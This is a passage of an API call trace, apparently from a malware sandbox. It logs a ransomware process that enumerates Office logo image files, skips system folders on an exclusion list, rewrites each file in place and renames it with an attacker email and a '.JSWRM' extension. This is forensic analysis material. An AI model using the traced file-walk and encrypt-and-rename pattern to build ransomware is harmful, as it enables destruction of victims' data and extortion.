lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.821] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2410) returned 1 [0133.821] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.821] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x960, lpOverlapped=0x0) returned 1 [0133.823] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.823] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x960, lpOverlapped=0x0) returned 1 [0133.823] CloseHandle (hObject=0x238) returned 1 [0133.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.824] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-black_scale-140.png", cAlternateFileName="VIC677~1.PNG")) returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="recovery") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="system volume information") returned 1 [0133.824] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.825] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3604) returned 1 [0133.825] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.826] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe10, lpOverlapped=0x0) returned 1 [0133.827] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.827] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe10, lpOverlapped=0x0) returned 1 [0133.827] CloseHandle (hObject=0x238) returned 1 [0133.827] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.828] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xee4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-black_scale-180.png", cAlternateFileName="VISIOL~3.PNG")) returned 1 [0133.828] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="recovery") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="system volume information") returned 1 [0133.829] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.830] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3812) returned 1 [0133.830] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.830] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xee0, lpOverlapped=0x0) returned 1 [0133.833] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.833] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xee0, lpOverlapped=0x0) returned 1 [0133.833] CloseHandle (hObject=0x238) returned 1 [0133.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.834] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x86e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-black_scale-80.png", cAlternateFileName="VISIOL~1.PNG")) returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="recovery") returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0133.834] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.835] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.835] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="system volume information") returned 1 [0133.835] lstrcmpiW (lpString1="VisioLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-black_scale-80.png", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 37 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.835] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.836] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2158) returned 1 [0133.836] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.836] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0133.837] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.837] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0133.837] CloseHandle (hObject=0x238) returned 1 [0133.837] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.839] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x954, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-white_scale-100.png", cAlternateFileName="VIFA3F~1.PNG")) returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="recovery") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0133.839] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.840] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2388) returned 1 [0133.841] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.841] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x950, lpOverlapped=0x0) returned 1 [0133.843] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.843] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x950, lpOverlapped=0x0) returned 1 [0133.843] CloseHandle (hObject=0x238) returned 1 [0133.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\VisioLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\visiologo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.844] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe11, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="VisioLogo.contrast-white_scale-140.png", cAlternateFileName="VISIOL~2.PNG")) returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0133.844] lstrcmpiW (lpString1="VisioLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioLogo.contrast-white_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.844] WideCharToMultiByte (in: CodePage=0xfde9, 